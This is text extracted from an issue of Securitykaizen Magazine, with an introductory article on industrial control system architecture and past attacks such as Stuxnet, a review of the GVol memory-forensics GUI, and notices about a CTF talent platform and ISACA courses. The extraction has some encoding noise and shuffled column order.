In the old days, ICS systems were isolated from the internet. ICS was just used to control a specific industrial process and there was no further needs. With the rapid growth of internet and IT technologies, it became necessary to connect ICS systems to IT networks for real time monitoring, analysis and even remote control. This lead to the exposure of these critical systems to vulnerabilities of IT networks. Now an attacker can attack an Oil & Gas company for example from outside. After gaining access to the internal network, he can pivot through the network till he reach a machine that controls a critical process like the flow of gas or petrol in a pipeline. Now he can switch off the flow causing severe financial loss to the company, and that’s the least he can do. He can also raise the flow causing a disruption or even an explosion that may lead to loss of lives.
It happened before Attacks against ICS are not that new, targeted or even non targeted attacks caused or almost caused major effects in the past. I’ll mention the most notable ones from my point of view. You can search for more and I assure you will find disasters. Note that all incidents you’re going to find are only the ones disclosed to public. There are lots of other incidents that were not disclosed for national security matters or whatever. The first incident that –in my opinion- changed the history of ICS security is the most advanced ICS malware ever created called Stuxnet hitting nuclear reactors in Iran and Russia and some other countries as well. In 2010 Stuxnet was a major topic in worldwide news after disruption of nuclear centrifuges in Iranian nuclear facility in Natanz. Stuxnet is twenty times complex computer virus that was only targeting motors of centrifuges in nuclear facilities and also pipelines. Stuxnet used four zero-day vulnerabilities in windows to propagate through networks and replicates itself into every single thumb drive that is connected to the infected system. Stuxnet was very targeting in such a way it will infect a system, look for specific software that is used to control Siemens PLCs, look into their control logic and search for any motors controlled by PLCs. If any motors found, it will monitor the frequency of the controlled motors, and only attacks if these motors spin between 807 Hz and 1210 Hz. Stuxnet attacks these systems by changing their rotational speed causing an increase in pressure. Moreover, Stuxnet would hide the real values of the system parameters giving normal readings to human engineers and operators while playing around with the motors’ speeds. If Stuxnet didn’t find any software on the infected system it
will remain dormant till this system either connect to another network or a thumb drive is connected to the infected machine. In both ways, it will replicate itself through the network or infected USB drives. And by the way, that’s how Iranian nuclear facilities were compromised although they were completely isolated from the internet. The second incident was in October 2013 when Israeli Road Control System got hacked causing traffic jam in Haifa highway for more than 20 minutes. A malware infected security camera in the Carmel Tunnel toll road and was able to gain its control. The next day, it shut down the roadway again during morning rush hour. It remained shut for eight hours, causing massive congestion. Experts who investigated this accident said that this malware was not sophisticated enough to be the work of another government and it was more likely done by hacktivists. There are a lot incidents related to targeting ICS systems and causing severe damages in some cases people actually died but I mentioned the above two incidents to demonstrate how computer viruses and series of ones and zeros could be weapons in cyberwarfare. And in cyberwarfare, which is better than ICS to attack when trying to harm your opponent’s infrastructure?!
What is ICS? “Industrial Control System” is a general term that encompasses several types of control systems used in industrial production, for example Distributed Control Systems [DCS] and Supervisory Control And Data Acquisition [SCADA]. ICSs control different types of industrial processes such as electrical, chemical, water, oil and gas.
Distributed Control Systems [DCS] DCS system controls industrial processes within the same geographic area such as a plant or a field. DCS can be dissected into two types of components. The first one is field devices spread across the plant to do the hard and dirty work and the second one is controlling devices located in the control room inside the plant or the field. In this control room human operators monitor the operation of the outside industrial process and issue commands according the readings coming from field devices. Note that all of this is happening on the same geographic area.
Issue 22 | www.bluekaizen.org | 27
Supervisory Control and Data Acquisition [SCADA] SCADA differs from DCS in such a way that there is a centralized system that monitors and controls entire sites or complexes of systems spread out over large area like countries or even continents.
SCADA can be divided into two parts - Supervisory Control â&#x20AC;˘ Responsible for automating the control process of running industrial processes with no human interaction by using Remote Terminal Units [RTUs], Intelligent Electronic Devices [IEDs], Programmable Logic Controllers [PLCs] or any other type of controllers
- Data Acquisition â&#x20AC;˘ Starts at the RTU/PLC level when analog signals coming from field devices are converted to digital signals and sent back to Human Machine Interfaces [HMI] so the human operator can monitor the readings of the running process and can make supervisory decisions to adjust or override normal RTU/PLC control. SCADA systems are now the most widely used systems across the globe since it facilitates controlling of different remote sites from only one central location. When dissecting SCADA components, they can be categorized according to their geographical position in two categories
SCADA Architecture
Issue 22 | Securitykaizen Magazine | 28
â&#x20AC;˘ Field Components â&#x20AC;˘ Control Center Components We will be looking into each component explaining how it works and its role in SCADA architecture. We will focus on control center devices and the controllers in the field. Weâ&#x20AC;&#x2122;ll also give a brief description about other field devices like sensors and motors.
Field Components
PLCs / RTU
These devices are responsible for gathering information about industrial process various parameters such as heat, pressure, flow, level and many others. These devices are called sensors. Sensors are widely used in any control system as they are considered the eyes and ears of every process controller.
There is a significant difference between PLCs and RTUs. A while back, PLCs were used only to control the industrial process and RTUs were used as communication translator between components in field and control center. RTU is microprocessor controlled device that understands analog signals coming from field devices like sensors and convert it into digital signals and packets that control center devices can process. RTUs also receive digital inputs from control center components and translate it back to analog signals which can be processed by field devices. So mainly RTUs interface field devices to control center components. Nowadays, PLCs took over the job of RTUs besides their main job automating the process control. PLCs become digital computer based controllers directly connected to both field devices and also control center devices. It handles the communication between control center and field devices in such a way where it sends the current values of different process parameters to control room devices. These values are fetched from sensors that are connected also to the PLC. PLC also send commands to action devices
Controllers
Action Devices
Field devices include those components who exist in the field and participate directly in the running industrial process. They can be categorized into three type according to their role:
- Information Gathering Devices - Controllers - Action Devices Information Gathering Devices
Controllers are considered as the mind of the ICS. Sensors gather information about the process pass it to controllers, controllers process this information and issue the right commands according to the logic they were programmed to. Then they pass these commands to action devices. The most common types of controllers are Programmable Logic Controllers [PLCs], Remote Terminal Unites [RTUs] and Intelligent Electronic Devices [IEDs].
Action devices are considered as the arms of the ICS. They are the ones who do the dirty work in the field. They receive commands from controllers and execute them. These devices could be a motor or a pump for example and the actions could be starting or stopping a motor, raising its rotational speed or switching a pump on or off.
Issue 22 | www.bluekaizen.org | 29
Control Center Components
collect data from various devices in SCADA network and log them to a database in real time. It also captures plant management information about production status, performance monitoring and quality assurance. Historian systems also offer the ability to view the data that has been logged normally in graph form, thus showing change in a specific value over time.
Engineering Station Control Center of any ICS system contains different types of components that assist human engineers and operators to monitor the running industrial process. Control Center could be connected to the IT network of the company to help upper layer managers take real time decisions like starting, holding or stopping the operation according to real time feeds they get from control center. These are the most common components you can find in a control center:
- HMI Servers - Historians - Controllers - Engineering Station Note that controllers could also be found in control centers not in the field, in some applications controllers are required to be near the human engineers.
HMI Servers HMI servers or Human Machine Interfaces are responsible for visualizing the running process so human operators can observe the current values of different parameters of the running process and also issue commands to adjust theses parametersâ&#x20AC;&#x2122; values through this interface. HMIs are connected to controllers to get the values of different industrial process parameters. It also can adjust these parameters by commands received from human operators or engineers. HMI is basically a software solution, each ICS vendor has their own version of HMI software. This software can be a desktop application that only can be accessed on a single machine or a web application based software that can be accessed both onsite and also remotely. This makes it easier for human operators to handle ICS processes anywhere even using their smartphones.
Historians Historian servers are important for retaining the events that happens across the SCADA system. Events in SCADA system could be a motor start or stop, temperature rise or alarm that was set off because of a critical condition in the system. Historians basically
Issue 22 | Securitykaizen Magazine | 30
Engineering Station is a computer used to update the control logic of PLCs and RTUs. Itâ&#x20AC;&#x2122;s used by engineers to change what output should RTU or PLC give when a certain input happens. Itâ&#x20AC;&#x2122;s also used for updating the firmware of PLCs, RTUs and IEDs. They are very similar to computers with IDE [Integrated Development Environment] software that developers use to develop different applications for example NetBeans or Visual Studio but in this case engineers are using another software to develop control logic on controllers. Each controller vendor has their software that is specially designed to develop control logic for their PLCs or RTUs.
How all of this are tied together? SCADA components are connected together in two types of networks, the first network connects field devices and controllers and they all speak analog signals. The second one connects controllers or signal converters (RTUs) with HMI servers, Historians, Engineering stations and application servers. All of those speak in packets meaning that they all communicate through normal TCP/IP packets we used to see in normal IT networks like HTTP, SMTP, DNS and so on. The difference here is in OT networks, they speak different protocols for example Modbus, DNP3, IEC61870-5, EtherNet/IP, OCP and so many other protocols. Some of these protocols are open and some others are proprietary protocols limited only to products of one specific vendor.
Conclusion To really understand risks facing our critical infrastructure we should understand their architecture and how all of its components are connected together. I hope this article gave you a glimpse of what ISC systems look like and how they operate. The next step after understanding ICS architecture components and how they are tied together is deeply dissecting different industrial protocols and understanding how they work in real world scenarios and then study their vulnerabilities and weaknesses. I hope you liked this journey and wish seeing you next time in another article.
started
a crowdfunding campaign on zoomaal to
raise 20,000 USD
You might have heard about the famous software development competitions like ACM, Google Jam or Facebook Hacker, how those competitions bring talented software developers from all over the world in one place, how software companies and recruiters are waiting for those competitions year after year to hire the best software developers in their organizations.But What about Cyber Security ? According to CISCO Annual Report in 2014, Nearly one million job openings in cyber security field are waiting for candidates to be fulfilled. It became so clear that the normal recruiting process is not working well. Most Recruitment processes focus on IQ exams, Language exams but when it comes to technical part which is the core of the security professional job, the company uses only technical interviews or just take the shiny certificates. Also one of the main reasons is that building a separate environment or labs for practical tests that includes different machines costs the organization a lot of money and a lot of administration efforts. It is obvious that we need a new way to measure the skills of cyber security professionals. Moataz Salah and Adham Mohamed, Founders of Cyber Talents portal said : Today, Cyber Security certificates are not measuring the real practical skills of any candidate. After running four Capture the Flag competitions in Cairo Security Camp Conference for 4 years , we realized that games and competitions are the best environment to spot the skills and talent in any field at early stage.Thatâ&#x20AC;&#x2122;s why we started to work on Cyber Talents . Cyber Talents is a portal that will let schools, universities, companies and governments to measure, assess and recruit cyber security candidates through hackathons, competitions and online lab challenges and assessments. Each user will have his own account working on solving hundreds of challenges in different cyber security fields for example network security, web application security, reverse engineering, digital forensics, cryptography and others . the more challenges you solve, the higher rank you get either over your country or the whole world. The cycle will be closed by enabling companies and recruiters who are desperately searching for cyber security talents to get access to those talents Moataz Salah and Adham Mohamed started a crowdfunding campaign on Zoomaal to raise 20,000 USD to be able to make their dream comes true. Cyber Talents will be the first platform to assess and measure the skills of cyber security professionals using a unique way which is online games and challenges with a clear goal to minimizing the shortage of technical cyber security professionals. Cyber Talents project will start its beta version by the end of this year, The team is seeking your support and contribution even by sharing the projectâ&#x20AC;&#x2122;s idea. to know more details about the project check the below link
http://www.zoomaal.com/projects/48486?ref=38627481 Issue 22 | www.bluekaizen.org | 31
www.bluekaizen.org
Reviews
Malware Review
GVOL
GUI app built in java for the purpose of malware analysis May Medhat
Malware Analyst at EG-CERT
Mohamed Shawky Developer at Eg-Cert
Issue 22 | Securitykaizen Magazine | 32
Every function performed whether by an application or operating system produces a particular change at (RAM) memory. Consequently, analyzing the data captured from memory image acquired from a target system gives an extraordinary insight into the runtime state of the memory, enables the analyst to track recent activities and bypass hiding tools such as those used by rootkits. Furthermore, analyst using memory analysis could examine critical data such as unencrypted mails, non-cacheable internet history events, code injectionâ&#x20AC;Śetc. Moreover, it is so useful for malware analysis procedures allowing analyst to know what occurred before and after infection of the system. One of the best toolkits used for memory analysis is Volatility. In this article, we introduce GVol which is a GUI and automation tool for Volatility framework. GVol is a lightweight GUI application built in Java designed to automate the usage of Volatility toolkit for the purpose of malware analysis. The application includes various Volatility plugins with their predefined options. In addition to that, users can create batch files to run multiple plugins at once to scan a memory image. Furthermore, GVol includes pre-configured batch files to simplify the usage of Volatility for malware analysis process.
The supported operating systems are Windows XP, 7, 8, 8.1, and Linux. The application requires the Java Runtime Environment. GVol has some predefined batch files, plugins, options and profiles.
5. Profiles can be added through “Add new profiles” section by writing the new Volatility profile and its description then click “Add Profile”.
GVol Features: 1. GVol automates the use of Volatility using a graphical user interface. 2. It works with any Volatility version. 3. GVol includes a set of predefined profiles for windows operating system, also the user can add new profiles of other operating systems. 4. User can select plugins and related options from the existing database or add new plugins or options. 5. GVol has batch file feature to run multiple plugins. In addition to that, user can set options for each plugin at batch file through a graphical wizard. 6. GVol contains a plugin description and malware analysis hints gathered from “The Art of Memory Forensics” book and “Volatility Command Reference” which can downloaded from this link: https://code. google.com/p/wiki/CommandReference23 7. GVol has a console output section which shows the command running at background and also the output generated. The user can chose to write this output to a file. The output file name will be a concatenation of the following image name, batch file name (if it was used) and plugin name.
6. To add new options or delete an old one, From “Configuration” menu, select “Volatility Options”. 7. Also, user can edit Volatility plugins and select their convenient options by selecting plugins from “Configuration” menu.
How to Use GVol: 1. Download GVol from the following link: https:// github.com/eg-cert/GVol 2. Open the file “GVol.jar” to open GVol main interface.
8. User also can update plugin description, by typing plugin name and its description then click “Yes” to update existing plugins.
GVol Batch File Feature: GVol Configuration: 1. Download Volatility toolkit: https://code.google. com/p/Volatility/downloads/list 2. Select “Configuration” from the main interface to edit Volatility configurations. 3. Select “Command & Profiles”. 4. Type the command that runs Volatility. It would be the path of the standalone executable or “Python vol. py” if you use the python script. Do not forget to click on “Apply Changes”.
User can run multiple plugins to scan a single image through Batch files as follows: 1. First of all, batch file must be added or selected from the main menu. 2. Select File then “Manage Batch Files”. 3. A new batch file can be added by typing its name to “Add new batch file” section. 4. Attach required plugins to the batch file selected Issue 22 | www.bluekaizen.org | 33
from “Add Plugins to the Selected Batch File.”
You can stop a running command by selecting its tab and clicking on the “Close current tab” button.
Running multiple plugins: 1. Determine the target image to scan and specify its profile. 2. Select the check box “Run batch file”. 3. Specify the required batch file. 4. Select the output directory. 5. Click “Run Batch”. 6. A wizard will appear to enable user set options for each plugin listed at the selected batch file. GVol includes preconfigured batch files, each batch file contains some plugins that could be used to achieve a certain scanning or detection. GVol available batch files now are: Code injection batch file, network artifacts batch file, rogue processes batch file, process Objects analysis and rootkits batch file.
Running GVol: User can select between two options either running GVol with single plugin or running multiple plugins by using the batch file option. Running single plugin: 1. Determine the target image to scan and specify its profile. 2. Check plugin description and hints by just pausing the mouse pointer at the selected plugin.
GVol Output: After running single plugin or batch file, user can check the running command and output also at “Console Output”
If the user selected the “write the output to a file” option and he specified the output directory. The output file will be generated as follows:
3. Choose plugins and set their options. 4. Select “Write the output to a file”. 5. Select the output directory. 6. Click “Run command”.
Notes: You can run another simultaneous command by repeating these steps (1-6). The output of the new command will be visible in a new tab in the output area.
Issue 22 | Securitykaizen Magazine | 34
- For single plugin, the output file name format will be as shown below: • Image name: Windows XP Professional-Snapshot1 • Plugin name: psxview • Output file number: output0
- For batch file, the output file name will be as shown below: • Image Name: Windows XP Professional-Snapshot1 • Batch file name: Rogue Processes • Plugin Name: psxview • Output file number: output0
www.bluekaizen.org
Reviews Course Review
signed an agreement with ISACA to be the first Cyber security Nexusâ&#x201E;˘ (CSX) Partner in the Middle East
Today, The impact and sophistication of cyber security challenges and attacks have created a global demand for talent that is outpacing the supply. To help fill the growing cyber security skills gap, ISACA created Cyber security Nexus (CSX) to provide guidance, career development, education and community for professionals at every stage of their careers.
BK Team
WWW.Bluekaizen.org
Issue 22 | www.bluekaizen.org | 35
At Cairo Security Camp 2015 Conference; Bluekaizen announced that it had successfully signed an agreement with ISACA to be the first partner for CSX courses in the Middle East.
Today, cyber security professionals can pursue the CSX Practitioner (CSXP) certification that demonstrates ability to be a first responder to cyber incidents, following established procedures and defined processes. CSXP indicates firewall, patching and anti-virus experience, as well as the ability to implement common security controls and perform vulnerability scans and analysis. Training for the exam is available through the following courses, which combine lecture and cyber lab experience and are offered through Bluekaizen as the official training partner in Middle East
Level 1: Identification and Protection, youâ&#x20AC;&#x2122;ll learn how to apply industrydeveloped, experience based methods to the identification of key networks and learn to develop appropriate protection mechanisms. Level 2: Detection, youâ&#x20AC;&#x2122;ll learn how to apply industry-developed, experience based methods to the leverage cyber security controls in order to identify system events and non-event level incidents and gain the skills necessary to detect potential network events and incidents. Level 3: Respond and Recover, youâ&#x20AC;&#x2122;ll learn how to apply industry-developed, experience-based methods required to draft and execute comprehensive incident response plans and documentation, and recuperate a system or network.
Issue 22 | Securitykaizen Magazine | 36
There will be also new CSX trainings that will be available later in 2015 from
S p e c i a l i s t
E x p e r t
After completing the Practitioner level, cyber security professionals can earn a CSX Specialist certification, designating them as specialists in one or more of five areas aligned to global cyber security frameworks: Identify, Protect, Detect, Respond, Recover.
This certification is designed for those with master-level technical skills who serve as an authoritative source for cyber security matters within an organization.
The First Class for CSX Practitioner Level 1 will be available through Bluekaizen on March 2016.
Issue 22 | www.bluekaizen.org | 37
2016